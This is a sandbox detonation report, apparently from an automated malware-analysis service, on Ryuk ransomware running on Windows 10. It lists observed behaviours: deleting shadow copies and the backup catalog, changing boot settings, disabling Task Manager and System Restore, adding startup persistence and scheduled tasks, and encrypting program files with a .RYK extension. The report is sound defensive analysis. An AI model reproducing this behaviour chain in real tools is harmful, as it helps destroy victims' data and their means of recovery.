SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\crashpad_1672_ZCDYKRYTHDHVHSUN

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1200-143-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-09-21 20:38

Reported

2022-09-21 20:41

Platform

win10v2004-20220812-en

Max time kernel

151s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ryuk.exe"

Signatures

Ryuk

ransomware ryuk

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables taskbar notifications via registry modification

evasion

Disables use of System Restore points

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_KMS_Client-ul.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_OEM_Perp-ul-phn.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\COPYRIGHT.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\GroupLimit.M2TS.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ul-phn.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\PREVIEW.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\selector.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Yellow Orange.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\Content.DATA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adobe_spinner.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Grace-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f2\FA000000002.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\classlist.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vreg\office.x-none.msi.16.x-none.vreg.dat.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_OEM_Perp-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\SQLENGINEMESSAGES.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\jquery.ui.touch-punch.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Grace-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTrial-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\illustrations.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSYUBIN7.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_checkbox_unselected_18.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\close.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\kab.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\STSLIST.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\AppStore_icon.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\AppStore_icon.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\et.pak.DATA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_Subscription-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019MSDNR_Retail-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_school.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-100.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL102.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\eBook.api.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\svgCheckboxSelected.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Grace-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Grace-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\AssetLibrary.ico.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-ae\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl C:\Windows\system32\wbadmin.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ryuk.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
